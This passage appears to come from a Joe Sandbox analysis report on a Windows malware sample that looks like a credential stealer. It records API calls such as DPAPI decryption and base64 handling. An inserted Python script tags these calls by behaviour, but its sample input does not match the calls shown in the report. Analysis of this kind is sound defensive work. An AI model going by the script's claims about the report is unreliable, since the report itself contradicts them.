                                    • Instruction Fuzzy Hash: 6A31A475A00219ABDB10CBD8EC45FEEB779EF45715F044169FA08E2240DBB49A09CBA2
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 008E40AD
                                    • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 008E40BC
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E40C3
                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 008E40F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptHeapString$AllocateProcess
                                    • String ID:
                                    • API String ID: 3825993179-0
                                    • Opcode ID: 4d738de28fdbb3c8a5e9e8ecda0365d9927d7730ce7eada58fc0f748b605d499
                                    • Instruction ID: 999755f3d6619041d0bde7437c6fa7fa2857db75cfb74a176b0eb7f0ebf39847
                                    • Opcode Fuzzy Hash: 4d738de28fdbb3c8a5e9e8ecda0365d9927d7730ce7eada58fc0f748b605d499
                                    • Instruction Fuzzy Hash: 5E012C70600209BBDB10DFE5EC89BABBBADEF85311F108069FE09C7240DA71D941CB60
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00000000,008EA400,000000FF), ref: 008E2B2F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E2B36
                                    • GetLocalTime.KERNEL32(?), ref: 008E2B42
                                    • wsprintfA.USER32 ref: 008E2B6E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 9d4a4817e68029138ab7112e751494f2180cdf71503f44374351b36fb4869649
                                    • Instruction ID: c501ee75ea5e21cbdb89db2e099a5a834fe77a9ead7d8adc0db722aa9dceada3
                                    • Opcode Fuzzy Hash: 9d4a4817e68029138ab7112e751494f2180cdf71503f44374351b36fb4869649
                                    • Instruction Fuzzy Hash: 910129B2904528ABCB14DBCADD49FBBB7BCFB4CA11F00021AF605A2280E6785941C7B5
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 008C9B9B
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 008C9BAA
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 008C9BC1
                                    • LocalFree.KERNEL32 ref: 008C9BD0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: e4fc5451e6c71dc46adef845112dab63c7e7520ddd0be29191ccd08e2cc26053
                                    • Instruction ID: 3c9f84c346c7b986a88ed2aabd87a65473e7c25c1b259c0ba592c0081d34a034
                                    • Opcode Fuzzy Hash: e4fc5451e6c71dc46adef845112dab63c7e7520ddd0be29191ccd08e2cc26053
                                    • Instruction Fuzzy Hash: 3DF0A9712443227BE7705BA5AC49F677BACEB04B61F240454FA49EA2C4DBB4DC41CAA4
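The APIs blocks above are what a triage analyst reads these function records for: CryptUnprotectData followed by WideCharToMultiByte (DPAPI decryption of stored credentials), the CreateToolhelp32Snapshot / Process32First / Process32Next walk (process enumeration), and the CryptBinaryToStringA / CryptStringToBinaryA pairs (base64 encode and decode). The following Python script is an added example, not Joe Sandbox's or the sample's own code: it parses such annotation lines into per-function call blocks, decodes the documented Win32 constants visible in the recovered arguments (40000001 = CRYPT_STRING_BASE64|CRYPT_STRING_NOCRLF, 00000128 = 296 = sizeof(PROCESSENTRY32), 00000002 = TH32CS_SNAPPROCESS, 00000040 = LMEM_ZEROINIT, 00000001 to CryptUnprotectData = CRYPTPROTECT_UI_FORBIDDEN) and tags each block with a behaviour label. The sample input is copied from this report's APIs blocks; the label names, the rule table and the choice of which argument positions to decode are this example's own assumptions, and "?" arguments are values the IDA plugin could not recover.

```python
"""Tag Joe Sandbox function annotations by the Win32 API chain they call.
Added example, not Joe Sandbox's or the sample's code; "?" arguments are values the
IDA plugin could not recover, so only the positions listed in ARG_DECODERS are read."""
import re
from collections import namedtuple
# Constructed input: "APIs" blocks copied from this report, one block per function.
SAMPLE_LINES = """\
APIs
• RtlAllocateHeap.NTDLL(00000000), ref: 008C76A5
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008C76CD
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 008C76ED
• LocalFree.KERNEL32(?), ref: 008C76F7
APIs
  • Part of subcall function 008E7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 008E722E
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008E3A36
• Process32First.KERNEL32(00000000,00000128), ref: 008E3A49
• Process32Next.KERNEL32(00000000,00000128), ref: 008E3A5F
• CloseHandle.KERNEL32(00000000), ref: 008E3B97
APIs
• CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 008E40AD
APIs
• CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 008C9B9B
• LocalAlloc.KERNEL32(00000040,00000000), ref: 008C9BAA
• LocalFree.KERNEL32 ref: 008C9BD0
"""

# One annotation line: bullet, optional "Part of subcall" prefix, Name.MODULE, optional (args).
API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
                    r"(?P<name>\w+)\.\w+(?:\((?P<args>[^)]*)\))?")
ApiCall = namedtuple("ApiCall", "name args")

# Behaviour labels are this example's own names; every API in the set must appear in the block.
BEHAVIOURS = [
    ("dpapi_decrypt", {"CryptUnprotectData"}),
    ("process_enumeration", {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"}),
    ("base64_encode", {"CryptBinaryToStringA"}),
    ("base64_decode", {"CryptStringToBinaryA"}),
]

def decode_crypt_string(value):
    # wincrypt.h: the low 16 bits select the format, the high bits are option flags.
    formats = {0: "CRYPT_STRING_BASE64HEADER", 1: "CRYPT_STRING_BASE64", 2: "CRYPT_STRING_BINARY"}
    names = [formats.get(value & 0xFFFF, f"format_{value & 0xFFFF:#x}")]
    names += ["CRYPT_STRING_NOCRLF"] if value & 0x40000000 else []
    return "|".join(names)

def decode_bits(value, table):
    names = [n for bit, n in table if value & bit]
    return "|".join(names) if names else f"{value:#x}"

# (API, argument index) -> decoder; constants are from the Win32 SDK headers.
ARG_DECODERS = {
    ("CryptBinaryToStringA", 2): decode_crypt_string,
    ("CryptStringToBinaryA", 2): decode_crypt_string,
    ("CryptUnprotectData", 5): lambda v: decode_bits(v, [(0x1, "CRYPTPROTECT_UI_FORBIDDEN")]),
    ("CreateToolhelp32Snapshot", 0): lambda v: decode_bits(v, [(0x2, "TH32CS_SNAPPROCESS")]),
    # 0x128 = 296 bytes is sizeof(PROCESSENTRY32) for the 32-bit ANSI structure.
    ("Process32First", 1): lambda v: f"dwSize={v}" + (" (sizeof(PROCESSENTRY32))" if v == 296 else ""),
    ("LocalAlloc", 0): lambda v: decode_bits(v, [(0x2, "LMEM_MOVEABLE"), (0x40, "LMEM_ZEROINIT")]),
}

def parse_arg(token):
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:
        return token  # the plugin printed a string literal such as "ERROR"

def parse_blocks(text):
    """Split the annotation text on "APIs" headers; each block becomes a list of ApiCall."""
    blocks = []
    for chunk in re.split(r"^\s*APIs\s*$", text, flags=re.MULTILINE):
        calls = []
        for m in filter(None, map(API_RE.match, chunk.splitlines())):
            raw = m.group("args")
            calls.append(ApiCall(m.group("name"), [parse_arg(a) for a in raw.split(",")] if raw else []))
        if calls:
            blocks.append(calls)
    return blocks

def classify(text):
    """One record per block: API names, matching behaviour labels, decoded flag arguments."""
    results = []
    for block in parse_blocks(text):
        names = {c.name for c in block}
        flags = {}
        for call in block:
            for idx, arg in enumerate(call.args):
                decoder = ARG_DECODERS.get((call.name, idx))
                if decoder and isinstance(arg, int):
                    flags[f"{call.name}[{idx}]"] = decoder(arg)
        results.append({"apis": [c.name for c in block], "flags": flags,
                        "labels": [lab for lab, need in BEHAVIOURS if need <= names]})
    return results
```

Run `classify(SAMPLE_LINES)` to get one record per function block; the rule table is deliberately conservative (a block is labelled only when every API of a chain is present), so an unlabelled block with a CryptUnprotectData call is impossible, but a block that only copies strings around gets no label and has to be read by hand.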
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: b o$cyw]$vK;
                                    • API String ID: 0-954764208
                                    • Opcode ID: ff051c11575b8a001573edea15f5d56d75d5ea4418927d136373d729b07d99ba
                                    • Instruction ID: 125c7663934560029bea43b10c8d78b0a7a0a4393c656cf5bc8afe3fc712be95
                                    • Opcode Fuzzy Hash: ff051c11575b8a001573edea15f5d56d75d5ea4418927d136373d729b07d99ba
                                    • Instruction Fuzzy Hash: 88B216F360C2049FD308AE2DEC8577ABBE5EF94720F1A893DE6C583744EA3558058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ATy7$LT{$_q Z
                                    • API String ID: 0-2510822072
                                    • Opcode ID: 9f1ff6e74acebee49c0e116584c691de1cf9d7fe462e9d98efacaf07cea8a960
                                    • Instruction ID: b4b6c00ef0cac27f50aaab90ab72a892fe41109711dd6c1149a3e5f9ac2dad2f
                                    • Opcode Fuzzy Hash: 9f1ff6e74acebee49c0e116584c691de1cf9d7fe462e9d98efacaf07cea8a960
                                    • Instruction Fuzzy Hash: B2B2F8F3A0C2009FE314AE2DEC8577ABBE9EF94720F16453DEAC5C7744E93598018696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: bRW$f}kq$~So
                                    • API String ID: 0-1783350195
                                    • Opcode ID: bfa3d157dfe1f0bc3a51ac61c7d79a93f49d07e2038d4bbe4c8a7d937386373c
                                    • Instruction ID: 9328be435ea10d71d8b3afb4ff362304df15afbf772cfb699f20896a7c223dfc
                                    • Opcode Fuzzy Hash: bfa3d157dfe1f0bc3a51ac61c7d79a93f49d07e2038d4bbe4c8a7d937386373c
                                    • Instruction Fuzzy Hash: C86206F3A082049FE3046F2DEC8567AFBE9EF94720F1A892DE6C4C3744E63558458697
                                    APIs
                                    • CoCreateInstance.COMBASE(008EB140,00000000,00000001,008EB130,?), ref: 008DCC06
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 008DCC46
                                    • lstrcpyn.KERNEL32(?,?,00000104), ref: 008DCCC9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                    • String ID:
                                    • API String ID: 1940255200-0
                                    • Opcode ID: fc630a8c373d87a21732cf555621dab6b95541dcf56c39ddee0bf58b2dc467b0
                                    • Instruction ID: 2ad14efad9209001629cfd453b2e42c54bbe363615bace0d08fce191e827ca85
                                    • Opcode Fuzzy Hash: fc630a8c373d87a21732cf555621dab6b95541dcf56c39ddee0bf58b2dc467b0
                                    • Instruction Fuzzy Hash: 55313271A40615AFD710DB94CC91FAAB7B9EB88B10F104294FA14EB3D0D7B0AE45CB90
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008C9BFF
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 008C9C13
                                    • LocalFree.KERNEL32(?), ref: 008C9C37
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: 485da97e9401b74ba98f94b55551f6369a2f7106e41314209e53885c1a0f8ee0
                                    • Instruction ID: 864fa15afca66360d9e4838f33c1e077c28ffe06722b6a04da255fad17b2699d
                                    • Opcode Fuzzy Hash: 485da97e9401b74ba98f94b55551f6369a2f7106e41314209e53885c1a0f8ee0
                                    • Instruction Fuzzy Hash: B501FF75A413096BE710DBE4DC45FBAB778EB44700F104558EA04AB280D7B09901CBD5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: "b_M$+B>
                                    • API String ID: 0-3685272674
                                    • Opcode ID: e2e615b30b8b81ace0e5d5f3e0bba80d77cf9a310de19528f4483548617b7125
                                    • Instruction ID: b1ba5f2eb5b997b1acaefaf7c3116cbe3ddb03ee0d6b2546d619980ae4ddb93a
                                    • Opcode Fuzzy Hash: e2e615b30b8b81ace0e5d5f3e0bba80d77cf9a310de19528f4483548617b7125
                                    • Instruction Fuzzy Hash: 3F82E4F260C2049FE304AF29EC8567AFBE5EF94720F16893DE6C583740EA3558448B97
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoSystemwsprintf
                                    • String ID:
                                    • API String ID: 2452939696-0
                                    • Opcode ID: 6b17983c8e71949c7222627b77fbbfc63bea7b810e6993a942734212737143ae
                                    • Instruction ID: 852fbb2061d1493d3cb0e3d2cc24a326e8eb8af5d75989039824cc1da833e8ca
                                    • Opcode Fuzzy Hash: 6b17983c8e71949c7222627b77fbbfc63bea7b810e6993a942734212737143ae
                                    • Instruction Fuzzy Hash: A4F06DB1940608AFCB10CB84EC45BA9B77DFB48A20F40466AEA15D2380DB782904CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: W.Fs
                                    • API String ID: 0-711085032
                                    • Opcode ID: b575b6466521229ecd5b9970de9203aef5fd23cec3456c42de838579b91e033e
                                    • Instruction ID: dc0aae5d0b69747bfa966f1896fabd8323c137469eef3942b8330b3cf47509ba
                                    • Opcode Fuzzy Hash: b575b6466521229ecd5b9970de9203aef5fd23cec3456c42de838579b91e033e
                                    • Instruction Fuzzy Hash: 825134F3A086149FF3046D28DC9577ABAD9EB84320F1A463EEE8593780E9395C044296
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $%
                                    • API String ID: 0-562803315
                                    • Opcode ID: 337b0f0f5ea1cefa8256a704702e59340ce505aef53af78b12bdcba4b826f1ea
                                    • Instruction ID: 3dd95b2cb02174d13875b3411c06003b5394191476e5b708bdbbf7f0374278e1
                                    • Opcode Fuzzy Hash: 337b0f0f5ea1cefa8256a704702e59340ce505aef53af78b12bdcba4b826f1ea
                                    • Instruction Fuzzy Hash: 555135F3D040205BF7585D39DD193767A96DBD0720F2BC23DAB98A77C8E93A580982C5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 4z,
                                    • API String ID: 0-3202762787
                                    • Opcode ID: 22dd380f0305766ded97704cb05ecc17f02397f5783c17123e1cab8f4663b7fe
                                    • Instruction ID: ae30e33ac17f38514853808c78274a15dd193def97fedcc6920aea22d5d9d33e
                                    • Opcode Fuzzy Hash: 22dd380f0305766ded97704cb05ecc17f02397f5783c17123e1cab8f4663b7fe
                                    • Instruction Fuzzy Hash: 3C5128B250C714DFC3107E2AD89667BF7E5EF94720F26492DE6C583200EA309840DBA7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 442eb04da5e9a7ba6d7ddd8f3251704623ce44f98cdec201135db14a28217b62
                                    • Instruction ID: 498ae92fa704c529b75f6fcc84107960e76dfd85960463a8fee935ce143fbb1c
                                    • Opcode Fuzzy Hash: 442eb04da5e9a7ba6d7ddd8f3251704623ce44f98cdec201135db14a28217b62
                                    • Instruction Fuzzy Hash: 0102D4F390C204AFE704AE2DEC8566AFBE9EFD4720F16853DE6C487744E63598058692
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 008D86C7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D86FF
                                    • lstrcpy.KERNEL32(?,00000000), ref: 008D873C
                                    • StrStrA.SHLWAPI(?,0053DF80), ref: 008D8761
                                    • lstrcpyn.KERNEL32(00AF93D0,?,00000000), ref: 008D8780
                                    • lstrlen.KERNEL32(?), ref: 008D8793
                                    • wsprintfA.USER32 ref: 008D87A3
                                    • lstrcpy.KERNEL32(?,?), ref: 008D87B9
                                    • StrStrA.SHLWAPI(?,0053E0E8), ref: 008D87E6
                                    • lstrcpy.KERNEL32(?,00AF93D0), ref: 008D8846
                                    • StrStrA.SHLWAPI(?,0053DF98), ref: 008D8873
                                    • lstrcpyn.KERNEL32(00AF93D0,?,00000000), ref: 008D8892
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                    • String ID: %s%s$0S$S$S
                                    • API String ID: 2672039231-2902472881
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C1E9F
                                    • lstrlen.KERNEL32(00538F88), ref: 008C1EAE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1EDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C1EE3
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1EEE
